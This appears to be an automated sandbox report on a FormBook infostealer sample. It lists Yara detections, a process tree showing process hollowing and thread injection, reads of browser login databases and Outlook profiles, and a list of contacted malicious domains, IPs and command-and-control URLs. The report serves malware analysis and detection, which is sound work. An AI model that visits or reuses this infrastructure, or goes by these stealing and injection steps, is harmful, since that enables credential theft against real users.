Source: Yara match File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\msdt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook (same Yara matches as listed under Stealing of Sensitive Information above)
Behavior Graph

Behavior Graph ID: 326334
Sample: AT113020.exe
Startdate: 03/12/2020
Architecture: WINDOWS
Score: 100

Start
  DNS/IP: www.rdhar1976.com; prda.aadg.msidentity.com; g.msn.com
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Sigma detected: Steal Google chrome login data; 2 other signatures
  started: AT113020.exe 1 16
    DNS/IP: cdn.discordapp.com 162.159.134.233, 443, 49713, 49720 CLOUDFLARENETUS United States; discord.com 162.159.136.232, 443, 49712, 49719 CLOUDFLARENETUS United States
    Dropped: C:\Users\user\AppData\Local\...\Accfdrv.exe, PE32
    Signatures: Creates autostart registry keys with suspicious names; Creates multiple autostart registry keys; Writes to foreign memory regions; 2 other signatures
    started: ieinstal.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      injected: explorer.exe 6
        DNS/IP: www.cia3mega.info 162.0.238.42, 49784, 49816, 49817 NAMECHEAP-NETUS Canada; 198.54.117.215, 49752, 49775, 49799 NAMECHEAP-NETUS United States; 22 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        started: msdt.exe 1 12
          Signatures: Tries to steal Mail credentials (via file access); Creates multiple autostart registry keys; Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures
          started: cmd.exe 2
            Dropped: C:\Users\user\AppData\Local\Temp\DB1, SQLite
            Signatures: Tries to harvest and steal browser information (history, passwords, etc)
            started: conhost.exe
        started: Accfdrv.exe 14
          DNS/IP: discord.com; cdn.discordapp.com
          Signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes
          started: ieinstal.exe
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
        started: Accfdrv.exe 13
          DNS/IP: discord.com; cdn.discordapp.com
          Signatures: Injects a PE file into a foreign processes
          started: ieinstal.exe
        3 other processes
          Signatures: Tries to detect virtualization through RDTSC time measurements

Contacted Public IPs

IP               Domain   Country                   ASN    ASN Name                   Malicious
162.0.238.42     unknown  Canada                    22612  NAMECHEAP-NETUS            true
162.159.136.232  unknown  United States             13335  CLOUDFLARENETUS            false
157.245.239.6    unknown  United States             14061  DIGITALOCEAN-ASNUS         true
23.227.38.74     unknown  Canada                    13335  CLOUDFLARENETUS            true
208.91.197.27    unknown  Virgin Islands (BRITISH)  40034  CONFLUENCE-NETWORK-INCVG   true
66.235.200.146   unknown  United States             13335  CLOUDFLARENETUS            true
104.24.104.178   unknown  United States             13335  CLOUDFLARENETUS            true
52.60.87.163     unknown  United States             16509  AMAZON-02US                true
198.54.117.210   unknown  United States             22612  NAMECHEAP-NETUS            false
34.102.136.180   unknown  United States             15169  GOOGLEUS                   true
104.31.71.137    unknown  United States             13335  CLOUDFLARENETUS            true
198.54.117.215   unknown  United States             22612  NAMECHEAP-NETUS            true
162.159.134.233  unknown  United States             13335  CLOUDFLARENETUS            false

Contacted Domains

Name IP Active
discord.com 162.159.136.232 true
pocketspacer.com 34.102.136.180 true
parkingpage.namecheap.com 198.54.117.210 true
cdn.discordapp.com 162.159.134.233 true
www.dainikamarsomoy.com 104.24.104.178 true
shops.myshopify.com 23.227.38.74 true
www.ahomedokita.com 157.245.239.6 true
www.rodgroup.net 208.91.197.27 true
www.cia3mega.info 162.0.238.42 true
buttsliders.com 34.102.136.180 true
higherthan75.com 66.235.200.146 true
www.sportsbookmatcher.com 104.31.71.137 true
www.makingdoathome.com 52.60.87.163 true
www.higherthan75.com unknown unknown
www.countrybarndogkennel.com unknown unknown
www.buttsliders.com unknown unknown
www.kingdomwinecommunity.com unknown unknown
www.thanksforlove.com unknown unknown
g.msn.com unknown unknown
www.outtheframecustoms.com unknown unknown
www.theyolokart.com unknown unknown
www.pocketspacer.com unknown unknown
www.renabbeauty.com unknown unknown
www.rdhar1976.com unknown unknown

Contacted URLs

Name  Malicious  Antivirus Detection  Reputation
http://www.renabbeauty.com/9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.ahomedokita.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.sportsbookmatcher.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.buttsliders.com/9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.theyolokart.com/9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.renabbeauty.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.makingdoathome.com/9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.dainikamarsomoy.com/9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.higherthan75.com/9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.ahomedokita.com/9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.cia3mega.info/9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.pocketspacer.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.thanksforlove.com/9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.dainikamarsomoy.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.makingdoathome.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.kingdomwinecommunity.com/9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.rodgroup.net/9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.outtheframecustoms.com/9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown
http://www.outtheframecustoms.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.thanksforlove.com/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.rodgroup.net/9t6k/  true  Avira URL Cloud: safe  unknown
http://www.pocketspacer.com/9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p  true  Avira URL Cloud: safe  unknown